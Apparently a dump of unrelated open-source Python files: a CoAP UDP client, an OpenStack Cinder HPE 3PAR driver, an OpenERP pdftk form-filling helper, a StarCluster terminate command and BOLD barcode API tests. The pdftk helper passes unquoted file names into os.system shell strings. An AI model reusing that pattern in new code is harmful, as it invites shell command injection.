self._socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._receiver_thread = None
def close(self):
"""
Stop the client.
"""
self.stopped.set()
for event in self.to_be_stopped:
event.set()
if self._receiver_thread is not None:
self._receiver_thread.join()
self._socket.close()
@property
def current_mid(self):
"""
Return the current MID.
:return: the current mid
"""
return self._currentMID
@current_mid.setter
def current_mid(self, c):
"""
Set the current MID.
:param c: the mid to set
"""
assert isinstance(c, int)
self._currentMID = c
def send_message(self, message):
"""
Prepare a message to send on the UDP socket. Eventually set retransmissions.
:param message: the message to send
"""
if isinstance(message, Request):
request = self._requestLayer.send_request(message)
request = self._observeLayer.send_request(request)
request = self._blockLayer.send_request(request)
transaction = self._messageLayer.send_request(request)
self.send_datagram(transaction.request)
if transaction.request.type == defines.Types["CON"]:
self._start_retransmission(transaction, transaction.request)
elif isinstance(message, Message):
message = self._observeLayer.send_empty(message)
message = self._messageLayer.send_empty(None, None, message)
self.send_datagram(message)
@staticmethod
def _wait_for_retransmit_thread(transaction):
"""
Only one retransmit thread at a time, wait for other to finish
"""
if hasattr(transaction, 'retransmit_thread'):
while transaction.retransmit_thread is not None:
logger.debug("Waiting for retransmit thread to finish ...")
time.sleep(0.01)
continue
def _send_block_request(self, transaction):
"""
A former request resulted in a block wise transfer. With this method, the block wise transfer
will be continued, including triggering of the retry mechanism.
:param transaction: The former transaction including the request which should be continued.
"""
transaction = self._messageLayer.send_request(transaction.request)
# ... but don't forget to reset the acknowledge flag
transaction.request.acknowledged = False
self.send_datagram(transaction.request)
if transaction.request.type == defines.Types["CON"]:
self._start_retransmission(transaction, transaction.request)
def send_datagram(self, message):
"""
Send a message over the UDP socket.
:param message: the message to send
"""
host, port = message.destination
logger.debug("send_datagram - " + str(message))
serializer = Serializer()
raw_message = serializer.serialize(message)
try:
self._socket.sendto(raw_message, (host, port))
except Exception as e:
if self._cb_ignore_write_exception is not None and callable(self._cb_ignore_write_exception):
if not self._cb_ignore_write_exception(e, self):
raise
if self._receiver_thread is None or not self._receiver_thread.isAlive():
self._receiver_thread = threading.Thread(target=self.receive_datagram)
self._receiver_thread.start()
def _start_retransmission(self, transaction, message):
"""
Start the retransmission task.
:type transaction: Transaction
:param transaction: the transaction that owns the message that needs retransmission
:type message: Message
:param message: the message that needs the retransmission task
"""
with transaction:
if message.type == defines.Types['CON']:
future_time = random.uniform(defines.ACK_TIMEOUT, (defines.ACK_TIMEOUT * defines.ACK_RANDOM_FACTOR))
transaction.retransmit_stop = threading.Event()
self.to_be_stopped.append(transaction.retransmit_stop)
transaction.retransmit_thread = threading.Thread(target=self._retransmit,
name=str('%s-Retry-%d' % (threading.current_thread().name, message.mid)),
args=(transaction, message, future_time, 0))
transaction.retransmit_thread.start()
def _retransmit(self, transaction, message, future_time, retransmit_count):
"""
Thread function to retransmit the message in the future
:param transaction: the transaction that owns the message that needs retransmission
:param message: the message that needs the retransmission task
:param future_time: the amount of time to wait before a new attempt
:param retransmit_count: the number of retransmissions
"""
with transaction:
logger.debug("retransmit loop ... enter")
while retransmit_count <= defines.MAX_RETRANSMIT \
and (not message.acknowledged and not message.rejected) \
and not transaction.retransmit_stop.isSet():
transaction.retransmit_stop.wait(timeout=future_time)
if not message.acknowledged and not message.rejected and not transaction.retransmit_stop.isSet():
retransmit_count += 1
future_time *= 2
if retransmit_count < defines.MAX_RETRANSMIT:
logger.debug("retransmit loop ... retransmit Request")
self.send_datagram(message)
if message.acknowledged or message.rejected:
message.timeouted = False
else:
logger.warning("Give up on message {message}".format(message=message.line_print))
message.timeouted = True
# Inform the user, that nothing was received
self._callback(None)
try:
self.to_be_stopped.remove(transaction.retransmit_stop)
except ValueError:
pass
transaction.retransmit_stop = None
transaction.retransmit_thread = None
logger.debug("retransmit loop ... exit")
def receive_datagram(self):
"""
Receive datagram from the UDP socket and invoke the callback function.
"""
logger.debug("Start receiver Thread")
while not self.stopped.isSet():
self._socket.settimeout(0.1)
try:
datagram, addr = self._socket.recvfrom(1152)
except socket.timeout: # pragma: no cover
continue
except Exception as e: # pragma: no cover
if self._cb_ignore_read_exception is not None and callable(self._cb_ignore_read_exception):
if self._cb_ignore_read_exception(e, self):
continue
return
else: # pragma: no cover
if len(datagram) == 0:
logger.debug("Exiting receiver Thread due to orderly shutdown on server end")
return
serializer = Serializer()
try:
host, port = addr
except ValueError:
host, port, tmp1, tmp2 = addr
source = (host, port)
message = serializer.deserialize(datagram, source)
if isinstance(message, Response):
logger.debug("receive_datagram - " + str(message))
transaction, send_ack = self._messageLayer.receive_response(message)
if transaction is None: # pragma: no cover
continue
self._wait_for_retransmit_thread(transaction)
if send_ack:
self._send_ack(transaction)
self._blockLayer.receive_response(transaction)
if transaction.block_transfer:
self._send_block_request(transaction)
continue
elif transaction is None: # pragma: no cover
self._send_rst(transaction)
return
self._observeLayer.receive_response(transaction)
if transaction.notification: # pragma: no cover
ack = Message()
ack.type = defines.Types['ACK']
ack = self._messageLayer.send_empty(transaction, transaction.response, ack)
self.send_datagram(ack)
self._callback(transaction.response)
else:
self._callback(transaction.response)
elif isinstance(message, Message):
self._messageLayer.receive_empty(message)
logger.debug("Exiting receiver Thread due to request")
def _send_ack(self, transaction):
"""
Sends an ACK message for the response.
:param transaction: transaction that holds the response
"""
ack = Message()
ack.type = defines.Types['ACK']
if not transaction.response.acknowledged:
ack = self._messageLayer.send_empty(transaction, transaction.response, ack)
self.send_datagram(ack)
def _send_rst(self, transaction): # pragma: no cover
"""
Sends an RST message for the response.
:param transaction: transaction that holds the response
"""
rst = Message()
rst.type = defines.Types['RST']
if not transaction.response.acknowledged:
rst = self._messageLayer.send_empty(transaction, transaction.response, rst)
self.send_datagram(rst)
|
openstack/cinder | refs/heads/master | cinder/volume/drivers/hpe/hpe_3par_base.py | 2 | # (c) Copyright 2013-2015 Hewlett Packard Enterprise Development LP
# All Rights Reserved.
#
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""
Base class for HPE Storage Drivers.
This driver requires 3.1.3 or later firmware on the 3PAR array, using
the 4.x version of the hpe3parclient.
You will need to install the python hpe3parclient.
sudo pip install --upgrade "hpe3parclient>=4.0"
"""
try:
from hpe3parclient import exceptions as hpeexceptions
except ImportError:
hpeexceptions = None
from oslo_log import log as logging
from cinder import exception
from cinder.i18n import _
from cinder.volume import driver
from cinder.volume.drivers.hpe import hpe_3par_common as hpecommon
from cinder.volume.drivers.san import san
from cinder.volume import volume_utils
LOG = logging.getLogger(__name__)
class HPE3PARDriverBase(driver.ManageableVD,
driver.ManageableSnapshotsVD,
driver.MigrateVD,
driver.BaseVD):
"""OpenStack base driver to enable 3PAR storage array.
Version history:
.. code-block:: none
1.0.0 - Initial base driver
1.0.1 - Adds consistency group capability in generic volume groups.
1.0.2 - Adds capability.
1.0.3 - Added Tiramisu feature on 3PAR.
1.0.4 - Fixed Volume migration for "in-use" volume. bug #1744021
1.0.5 - Set proper backend on subsequent operation, after group
failover. bug #1773069
"""
VERSION = "1.0.5"
def __init__(self, *args, **kwargs):
super(HPE3PARDriverBase, self).__init__(*args, **kwargs)
self._active_backend_id = kwargs.get('active_backend_id', None)
self.configuration.append_config_values(hpecommon.hpe3par_opts)
self.configuration.append_config_values(san.san_opts)
self.protocol = None
@staticmethod
def get_driver_options():
return hpecommon.HPE3PARCommon.get_driver_options()
def _init_common(self):
return hpecommon.HPE3PARCommon(self.configuration,
self._active_backend_id)
def _login(self, timeout=None, array_id=None):
common = self._init_common()
# If replication is enabled and we cannot login, we do not want to
# raise an exception so a failover can still be executed.
try:
common.do_setup(None, timeout=timeout, stats=self._stats,
array_id=array_id)
common.client_login()
except Exception:
if common._replication_enabled:
LOG.warning("The primary array is not reachable at this "
"time. Since replication is enabled, "
"listing replication targets and failing over "
"a volume can still be performed.")
else:
raise
return common
def _logout(self, common):
# If replication is enabled and we do not have a client ID, we did not
# login, but can still failover. There is no need to logout.
if common.client is None and common._replication_enabled:
return
common.client_logout()
def _check_flags(self, common):
"""Sanity check to ensure we have required options set."""
required_flags = ['hpe3par_api_url', 'hpe3par_username',
'hpe3par_password', 'san_ip', 'san_login',
'san_password']
common.check_flags(self.configuration, required_flags)
def get_volume_replication_driver_data(self, volume):
if (volume.get("group_id") and volume.get("replication_status") and
volume.get("replication_status") == "failed-over"):
return int(volume.get("replication_driver_data"))
return None
@volume_utils.trace
def get_volume_stats(self, refresh=False):
# NOTE(geguileo): We don't need to login to the backed if we are not
# going to refresh the stats, furthermore if we login, then we'll
# return an empty dict, because the _login method calls calls
# _init_common which returns a new HPE3PARCommon instance each time,
# so it won't have any cached values.
if not refresh:
return self._stats
common = self._login()
try:
self._stats = common.get_volume_stats(
refresh,
self.get_filter_function(),
self.get_goodness_function())
self._stats['storage_protocol'] = self.protocol
self._stats['driver_version'] = self.VERSION
backend_name = self.configuration.safe_get('volume_backend_name')
self._stats['volume_backend_name'] = (backend_name or
self.__class__.__name__)
return self._stats
finally:
self._logout(common)
def check_for_setup_error(self):
"""Setup errors are already checked for in do_setup so return pass."""
pass
@volume_utils.trace
def create_volume(self, volume):
common = self._login()
try:
return common.create_volume(volume)
finally:
self._logout(common)
@volume_utils.trace
def create_cloned_volume(self, volume, src_vref):
"""Clone an existing volume."""
common = self._login()
try:
return common.create_cloned_volume(volume, src_vref)
finally:
self._logout(common)
@volume_utils.trace
def delete_volume(self, volume):
common = self._login()
try:
common.delete_volume(volume)
finally:
self._logout(common)
@volume_utils.trace
def create_volume_from_snapshot(self, volume, snapshot):
"""Creates a volume from a snapshot.
TODO: support using the size from the user.
"""
common = self._login()
try:
return common.create_volume_from_snapshot(volume, snapshot)
finally:
self._logout(common)
@volume_utils.trace
def create_snapshot(self, snapshot):
common = self._login()
try:
common.create_snapshot(snapshot)
finally:
self._logout(common)
@volume_utils.trace
def delete_snapshot(self, snapshot):
common = self._login()
try:
common.delete_snapshot(snapshot)
finally:
self._logout(common)
@volume_utils.trace
def extend_volume(self, volume, new_size):
common = self._login()
try:
common.extend_volume(volume, new_size)
finally:
self._logout(common)
@volume_utils.trace
def create_group(self, context, group):
common = self._login()
try:
return common.create_group(context, group)
finally:
self._logout(common)
@volume_utils.trace
def create_group_from_src(self, context, group, volumes,
group_snapshot=None, snapshots=None,
source_group=None, source_vols=None):
common = self._login()
try:
return common.create_group_from_src(
context, group, volumes, group_snapshot, snapshots,
source_group, source_vols)
finally:
self._logout(common)
@volume_utils.trace
def delete_group(self, context, group, volumes):
common = self._login()
try:
return common.delete_group(context, group, volumes)
finally:
self._logout(common)
@volume_utils.trace
def update_group(self, context, group, add_volumes=None,
remove_volumes=None):
common = self._login()
try:
return common.update_group(context, group, add_volumes,
remove_volumes)
finally:
self._logout(common)
@volume_utils.trace
def create_group_snapshot(self, context, group_snapshot, snapshots):
common = self._login()
try:
return common.create_group_snapshot(context, group_snapshot,
snapshots)
finally:
self._logout(common)
@volume_utils.trace
def delete_group_snapshot(self, context, group_snapshot, snapshots):
common = self._login()
try:
return common.delete_group_snapshot(context, group_snapshot,
snapshots)
finally:
self._logout(common)
@volume_utils.trace
def manage_existing(self, volume, existing_ref):
common = self._login()
try:
return common.manage_existing(volume, existing_ref)
finally:
self._logout(common)
@volume_utils.trace
def manage_existing_snapshot(self, snapshot, existing_ref):
common = self._login()
try:
return common.manage_existing_snapshot(snapshot, existing_ref)
finally:
self._logout(common)
@volume_utils.trace
def manage_existing_get_size(self, volume, existing_ref):
common = self._login()
try:
return common.manage_existing_get_size(volume, existing_ref)
finally:
self._logout(common)
@volume_utils.trace
def manage_existing_snapshot_get_size(self, snapshot, existing_ref):
common = self._login()
try:
return common.manage_existing_snapshot_get_size(snapshot,
existing_ref)
finally:
self._logout(common)
@volume_utils.trace
def unmanage(self, volume):
common = self._login()
try:
common.unmanage(volume)
finally:
self._logout(common)
@volume_utils.trace
def unmanage_snapshot(self, snapshot):
common = self._login()
try:
common.unmanage_snapshot(snapshot)
finally:
self._logout(common)
@volume_utils.trace
def retype(self, context, volume, new_type, diff, host):
"""Convert the volume to be of the new type."""
common = self._login()
try:
return common.retype(volume, new_type, diff, host)
finally:
self._logout(common)
@volume_utils.trace
def migrate_volume(self, context, volume, host):
if volume['status'] == 'in-use':
protocol = host['capabilities']['storage_protocol']
if protocol != self.protocol:
LOG.debug("3PAR %(protocol)s driver cannot migrate in-use "
"volume to a host with "
"storage_protocol=%(storage_protocol)s",
{'protocol': self.protocol,
'storage_protocol': protocol})
return False, None
common = self._login()
try:
return common.migrate_volume(volume, host)
finally:
self._logout(common)
@volume_utils.trace
def update_migrated_volume(self, context, volume, new_volume,
original_volume_status):
"""Update the name of the migrated volume to it's new ID."""
common = self._login()
try:
return common.update_migrated_volume(context, volume, new_volume,
original_volume_status)
finally:
self._logout(common)
@volume_utils.trace
def get_pool(self, volume):
common = self._login()
try:
return common.get_cpg(volume)
except hpeexceptions.HTTPNotFound:
reason = (_("Volume %s doesn't exist on array.") % volume)
LOG.error(reason)
raise exception.InvalidVolume(reason)
finally:
self._logout(common)
@volume_utils.trace
def revert_to_snapshot(self, context, volume, snapshot):
"""Revert volume to snapshot."""
common = self._login()
try:
common.revert_to_snapshot(volume, snapshot)
finally:
self._logout(common)
@volume_utils.trace
def failover_host(self, context, volumes, secondary_id=None, groups=None):
"""Force failover to a secondary replication target."""
common = self._login(timeout=30)
try:
# Update the active_backend_id in the driver and return it.
active_backend_id, volume_updates, group_update_list = (
common.failover_host(
context, volumes, secondary_id, groups))
self._active_backend_id = active_backend_id
return active_backend_id, volume_updates, group_update_list
finally:
self._logout(common)
def enable_replication(self, context, group, volumes):
"""Enable replication for a group.
:param context: the context
:param group: the group object
:param volumes: the list of volumes
:returns: model_update, None
"""
common = self._login()
try:
return common.enable_replication(context, group, volumes)
finally:
self._logout(common)
def disable_replication(self, context, group, volumes):
"""Disable replication for a group.
:param context: the context
:param group: the group object
:param volumes: the list of volumes
:returns: model_update, None
"""
common = self._login()
try:
return common.disable_replication(context, group, volumes)
finally:
self._logout(common)
def failover_replication(self, context, group, volumes,
secondary_backend_id=None):
"""Failover replication for a group.
:param context: the context
:param group: the group object
:param volumes: the list of volumes
:param secondary_backend_id: the secondary backend id - default None
:returns: model_update, vol_model_updates
"""
common = self._login()
try:
return common.failover_replication(
context, group, volumes, secondary_backend_id)
finally:
self._logout(common)
def do_setup(self, context):
common = self._init_common()
common.do_setup(context)
self._check_flags(common)
common.check_for_setup_error()
self._do_setup(common)
def _do_setup(self, common):
pass
def create_export(self, context, volume, connector):
pass
def ensure_export(self, context, volume):
pass
def remove_export(self, context, volume):
pass
def terminate_connection(self, volume, connector, **kwargs):
pass
def initialize_connection(self, volume, connector):
pass
@volume_utils.trace
def _init_vendor_properties(self):
"""Create a dictionary of vendor unique properties.
This method creates a dictionary of vendor unique properties
and returns both created dictionary and vendor name.
Returned vendor name is used to check for name of vendor
unique properties.
- Vendor name shouldn't include colon(:) because of the separator
and it is automatically replaced by underscore(_).
ex. abc:d -> abc_d
- Vendor prefix is equal to vendor name.
ex. abcd
- Vendor unique properties must start with vendor prefix + ':'.
ex. abcd:maxIOPS
Each backend driver needs to override this method to expose
its own properties using _set_property() like this:
self._set_property(
properties,
"vendorPrefix:specific_property",
"Title of property",
_("Description of property"),
"type")
: return dictionary of vendor unique properties
: return vendor name
prefix: HPE:3PAR --> HPE_3PAR
"""
properties = {}
valid_prov_values = ['thin', 'full', 'dedup']
valid_persona_values = ['2 - Generic-ALUA',
'1 - Generic',
'3 - Generic-legacy',
'4 - HPEUX-legacy',
'5 - AIX-legacy',
'6 - EGENERA',
'7 - ONTAP-legacy',
'8 - VMware',
'9 - OpenVMS',
'10 - HPEUX',
'11 - WindowsServer']
self._set_property(
properties,
"HPE:3PAR:hpe3par:snap_cpg",
"Snap CPG Extra-specs.",
_("Specifies the Snap CPG for a volume type. It overrides the "
"hpe3par_cpg_snap setting. Defaults to the hpe3par_cpg_snap "
"setting in the cinder.conf file. If hpe3par_cpg_snap is not "
"set, it defaults to the hpe3par_cpg setting."),
"string")
self._set_property(
properties,
"HPE:3PAR:hpe3par:persona",
"Host Persona Extra-specs.",
_("Specifies the host persona property for a volume type. It "
"overrides the hpe3par_cpg_snap setting. Defaults to the "
"hpe3par_cpg_snap setting in the cinder.conf file. "
"If hpe3par_cpg_snap is not set, "
"it defaults to the hpe3par_cpg setting."),
"string",
enum=valid_persona_values,
default="2 - Generic-ALUA")
self._set_property(
properties,
"HPE:3PAR:hpe3par:vvs",
"Virtual Volume Set Extra-specs.",
_("The virtual volume set name that has been set up by the "
"administrator that would have predefined QoS rules "
"associated with it. If you specify extra_specs "
"hpe3par:vvs, the qos_specs minIOPS, maxIOPS, minBWS, "
"and maxBWS settings are ignored."),
"string")
self._set_property(
properties,
"HPE:3PAR:hpe3par:flash_cache",
"Flash cache Extra-specs.",
_("Enables Flash cache setting for a volume type."),
"boolean",
default=False)
self._set_property(
properties,
"HPE:3PAR:hpe3par:provisioning",
"Storage Provisioning Extra-specs.",
_("Specifies the provisioning for a volume type."),
"string",
enum=valid_prov_values,
default="thin")
self._set_property(
properties,
"HPE:3PAR:hpe3par:compression",
"Storage Provisioning Extra-specs.",
_("Enables compression for a volume type. "
"Minimum requirement of 3par OS version is 3.3.1 "
"with SSD drives only. "
"Volume size must have > 16 GB to enable "
"compression on volume. "
"A full provisioned volume cannot be compressed."),
"boolean",
default=False)
self._set_property(
properties,
"HPE:3PAR:replication_enabled",
"Volume Replication Extra-specs.",
_("The valid value is: <is> True "
"If True, the volume is to be replicated, if supported, "
"by the backend driver. If the option is not specified or "
"false, then replication is not enabled. This option is "
"required to enable replication."),
"string",
enum=["<is> True"],
default=False)
self._set_property(
properties,
"HPE:3PAR:replication:mode",
"Replication Mode Extra-specs.",
_("Sets the replication mode for 3par."),
"string",
enum=["sync", "periodic"],
default="periodic")
self._set_property(
properties,
"HPE:3PAR:replication:sync_period",
"Sync Period for Volume Replication Extra-specs.",
_("Sets the time interval for synchronization. "
"Only needed if replication:mode is periodic."),
"integer",
default=900)
self._set_property(
properties,
"HPE:3PAR:replication:retention_count",
"Retention Count for Replication Extra-specs.",
_("Sets the number of snapshots that will be "
"saved on the primary array."),
"integer",
default=5)
self._set_property(
properties,
"HPE:3PAR:replication:remote_retention_count",
"Remote Retention Count for Replication Extra-specs.",
_("Sets the number of snapshots that will be "
"saved on the secondary array."),
"integer",
default=5)
# ###### QoS Settings ###### #
self._set_property(
properties,
"HPE:3PAR:minIOPS",
"Minimum IOPS QoS.",
_("Sets the QoS, I/O issue count minimum goal. "
"If not specified, there is no limit on I/O issue count."),
"integer")
self._set_property(
properties,
"HPE:3PAR:maxIOPS",
"Maximum IOPS QoS.",
_("Sets the QoS, I/O issue count rate limit. "
"If not specified, there is no limit on I/O issue count."),
"integer")
self._set_property(
properties,
"HPE:3PAR:minBWS",
"Minimum Bandwidth QoS.",
_("Sets the QoS, I/O issue bandwidth minimum goal. "
"If not specified, there is no limit on "
"I/O issue bandwidth rate."),
"integer")
self._set_property(
properties,
"HPE:3PAR:maxBWS",
"Maximum Bandwidth QoS.",
_("Sets the QoS, I/O issue bandwidth rate limit. "
"If not specified, there is no limit on I/O issue "
"bandwidth rate."),
"integer")
self._set_property(
properties,
"HPE:3PAR:latency",
"Latency QoS.",
_("Sets the latency goal in milliseconds."),
"integer")
self._set_property(
properties,
"HPE:3PAR:priority",
"Priority QoS.",
_("Sets the priority of the QoS rule over other rules."),
"string",
enum=["low", "normal", "high"],
default="normal")
return properties, 'HPE:3PAR'
|
savoirfairelinux/OpenUpgrade | refs/heads/master | openerp/tools/pdf_utils.py | 456 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
""" Copyright (c) 2003-2007 LOGILAB S.A. (Paris, FRANCE).
http://www.logilab.fr/ -- mailto:[email protected]
manipulate pdf and fdf files. pdftk recommended.
Notes regarding pdftk, pdf forms and fdf files (form definition file)
fields names can be extracted with:
pdftk orig.pdf generate_fdf output truc.fdf
to merge fdf and pdf:
pdftk orig.pdf fill_form test.fdf output result.pdf [flatten]
without flatten, one could further edit the resulting form.
with flatten, everything is turned into text.
"""
from __future__ import with_statement
import os
import tempfile
HEAD="""%FDF-1.2
%\xE2\xE3\xCF\xD3
1 0 obj
<<
/FDF
<<
/Fields [
"""
TAIL="""]
>>
>>
endobj
trailer
<<
/Root 1 0 R
>>
%%EOF
"""
def output_field(f):
return "\xfe\xff" + "".join( [ "\x00"+c for c in f ] )
def extract_keys(lines):
keys = []
for line in lines:
if line.startswith('/V'):
pass #print 'value',line
elif line.startswith('/T'):
key = line[7:-2]
key = ''.join(key.split('\x00'))
keys.append( key )
return keys
def write_field(out, key, value):
out.write("<<\n")
if value:
out.write("/V (%s)\n" %value)
else:
out.write("/V /\n")
out.write("/T (%s)\n" % output_field(key) )
out.write(">> \n")
def write_fields(out, fields):
out.write(HEAD)
for key in fields:
value = fields[key]
write_field(out, key, value)
# write_field(out, key+"a", value) # pour copie-carbone sur autres pages
out.write(TAIL)
def extract_keys_from_pdf(filename):
# what about using 'pdftk filename dump_data_fields' and parsing the output ?
tmp_file = tempfile.mkstemp(".fdf")[1]
try:
os.system('pdftk %s generate_fdf output \"%s\"' % (filename, tmp_file))
with open(tmp_file, "r") as ofile:
lines = ofile.readlines()
finally:
try:
os.remove(tmp_file)
except Exception:
pass # nothing to do
return extract_keys(lines)
def fill_pdf(infile, outfile, fields):
tmp_file = tempfile.mkstemp(".fdf")[1]
try:
with open(tmp_file, "w") as ofile:
write_fields(ofile, fields)
os.system('pdftk %s fill_form \"%s\" output %s flatten' % (infile, tmp_file, outfile))
finally:
try:
os.remove(tmp_file)
except Exception:
pass # nothing to do
def testfill_pdf(infile, outfile):
keys = extract_keys_from_pdf(infile)
fields = []
for key in keys:
fields.append( (key, key, '') )
fill_pdf(infile, outfile, fields)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
opoplawski/StarCluster | refs/heads/develop | starcluster/commands/terminate.py | 19 | # Copyright 2009-2014 Justin Riley
#
# This file is part of StarCluster.
#
# StarCluster is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option) any
# later version.
#
# StarCluster is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with StarCluster. If not, see <http://www.gnu.org/licenses/>.
from starcluster import exception
from starcluster.logger import log
from completers import ClusterCompleter
class CmdTerminate(ClusterCompleter):
"""
terminate [options] <cluster_tag> ...
Terminate a running or stopped cluster
Example:
$ starcluster terminate mycluster
This will terminate a currently running or stopped cluster tagged
"mycluster".
All nodes will be terminated, all spot requests (if any) will be
cancelled, and the cluster's security group will be removed. If the
cluster uses EBS-backed nodes then each node's root volume will be
deleted. If the cluster uses "cluster compute" instance types the
cluster's placement group will also be removed.
"""
names = ['terminate']
def addopts(self, parser):
parser.add_option("-c", "--confirm", dest="confirm",
action="store_true", default=False,
help="Do not prompt for confirmation, "
"just terminate the cluster")
parser.add_option("-f", "--force", dest="force", action="store_true",
default=False, help="Terminate cluster regardless "
"of errors if possible ")
def _terminate_cluster(self, cl):
if not self.opts.confirm:
action = 'Terminate'
if cl.is_ebs_cluster():
action = 'Terminate EBS'
resp = raw_input(
"%s cluster %s (y/n)? " % (action, cl.cluster_tag))
if resp not in ['y', 'Y', 'yes']:
log.info("Aborting...")
return
cl.terminate_cluster()
def _terminate_manually(self, cl):
if not self.opts.confirm:
resp = raw_input("Terminate cluster %s (y/n)? " % cl.cluster_tag)
if resp not in ['y', 'Y', 'yes']:
log.info("Aborting...")
return
insts = cl.cluster_group.instances()
for inst in insts:
log.info("Terminating %s" % inst.id)
inst.terminate()
cl.terminate_cluster(force=True)
def terminate(self, cluster_name, force=False):
if force:
log.warn("Ignoring cluster settings due to --force option")
try:
cl = self.cm.get_cluster(cluster_name, load_receipt=not force,
require_keys=not force)
if force:
self._terminate_manually(cl)
else:
self._terminate_cluster(cl)
except exception.ClusterDoesNotExist:
raise
except Exception:
log.error("Failed to terminate cluster!", exc_info=True)
if not force:
log.error("Use -f to forcefully terminate the cluster")
raise
def execute(self, args):
if not args:
self.parser.error("please specify a cluster")
for cluster_name in args:
try:
self.terminate(cluster_name, force=self.opts.force)
except EOFError:
print 'Interrupted, exiting...'
return
|
ol-loginov/intellij-community | refs/heads/master | python/testData/stubs/DunderAll.py | 83 | __all__ = ['foo', 'bar']
|
carlosp420/bold | refs/heads/master | tests/test_bold_api.py | 1 | # -*- coding: utf-8 -*-
import unittest
import warnings
from Bio import BiopythonWarning
from Bio._py3k import HTTPError
from Bio import MissingExternalDependencyError
import bold
from bold import api
class TestApi(unittest.TestCase):
def setUp(self):
warnings.simplefilter('ignore', BiopythonWarning)
def test_call_id(self):
seq = "TTTTTGGTATTTGAGCAGGAATAGTAGGAACTTCTCTCAGTTTAATTATTCGAATAGAATTAGGTAATCCAGGTTTCTTAATTGGAGATGATCAAATTTATAATACTATTGTAACAGCCCATGCTTTTATTATAATTTTTTTTATAGTTATACCTATTGTAATTGGAGGATTTGGAAATTGACTAGTTCCCCTAATATTAGGTGCACCTGATATAGCTTTCCCTCGTATAAATAATATAAGATATTGACTACTTCCACCATCTTTAATATTATTAATTTCAAGTAGTATTGTAGAAAATGGAGCTGGAACAGGTTGAACAGTTTACCCCCCTCTTTCCTCTAATATTGCTCATAGAGGAACCTCAGTAGACTTAGCAATTTTTTCTCTTCATTTAGCTGGTATTTCTTCTATTTTAGGAGCTATTAATTTTATTACTACAATTATTAATATACGAGTTAATGGAATATCCTATGATCAAATACCTTTATTTGTTTGAGCTGTTGGAATTACAGCTCTTCTTTTACTTCTTTCTTTACCTGTTTTAGCAGGAGCTATCACAATACTTCTTACAGATCGAAATTTAAATACATCATTTTTTGATCCTGCAGGAGGAGGTGATCCAATTTTATACCAACATTTATTTTGATTTTTTGGTCACCC"
db = "COX1_SPECIES_PUBLIC"
res = bold.call_id(seq, db)
for item in res.items:
if item['similarity'] == 1:
self.assertEqual('Euptychia ordinata', item['taxonomic_identification'])
def test_call_taxon_search(self):
taxonomic_identification = 'Euptychia ordinata'
expected = 302603
res = bold.call_taxon_search(taxonomic_identification, fuzzy=False)
item = res.items[0]
self.assertEqual(expected, item['tax_id'])
taxonomic_identification = 'Fabaceae'
res = bold.call_taxon_search(taxonomic_identification, fuzzy=False)
item = res.items[0]
self.assertEqual('Plants', item['tax_division'])
self.assertEqual(187, item['parent_id'])
self.assertEqual('Fabales', item['parent_name'])
self.assertEqual('Fabaceae', item['taxon_rep'])
taxonomic_identification = 'Diplura'
res = bold.call_taxon_search(taxonomic_identification, fuzzy=False)
self.assertEqual(2, len(res.items))
def test_call_taxon_search_returns_empty(self):
taxonomic_identification = 'Fake species name'
self.assertRaises(ValueError, bold.call_taxon_search, taxonomic_identification, fuzzy=False)
def test_call_taxon_search_fuzzy_true(self):
taxonomic_identification = 'Fabaceae'
res = bold.call_taxon_search(taxonomic_identification, fuzzy=True)
self.assertEqual(5, len(res.items))
def test_call_taxon_search_fuzzy_error(self):
self.assertRaises(ValueError, bold.call_taxon_search, 'Fabaceae', 'true')
def test_call_specimen_data(self):
taxon = 'Euptychia'
res = bold.call_specimen_data(taxon)
item = res.items[0]
self.assertEqual('Nymphalidae', item['taxonomy_family_taxon_name'])
def test_call_specimen_data_several_taxa(self):
taxon = 'Euptychia|Mycalesis'
res = bold.call_specimen_data(taxon)
self.assertTrue('Mycalesis' in [item['taxonomy_genus_taxon_name'] for item in res.items])
def test_call_specimen_data_bin(self):
bin = 'BOLD:AAE2777'
res = bold.call_specimen_data(bin=bin)
taxonomy_identifications = []
append = taxonomy_identifications.append
for item in res.items:
if 'taxonomy_identification_provided_by' in item:
append(item['taxonomy_identification_provided_by'])
self.assertTrue('Jose Montero' in taxonomy_identifications)
def test_call_specimen_data_container(self):
container = 'ACRJP'
try:
res = bold.call_specimen_data(container=container)
except HTTPError:
# e.g. due to timeout
raise MissingExternalDependencyError("internet connection failed")
taxonomy_identifications = []
append = taxonomy_identifications.append
for item in res.items:
if 'taxonomy_identification_provided_by' in item:
append(item['taxonomy_identification_provided_by'])
self.assertTrue('Jacques L. Pierre' in taxonomy_identifications)
def test_call_specimen_data_institutions(self):
institutions = 'University of Turku'
res = bold.call_specimen_data(institutions=institutions)
taxonomy_identifications = []
append = taxonomy_identifications.append
for item in res.items:
if 'taxonomy_identification_provided_by' in item:
append(item['taxonomy_identification_provided_by'])
self.assertTrue('Meri Lindqvist' in taxonomy_identifications)
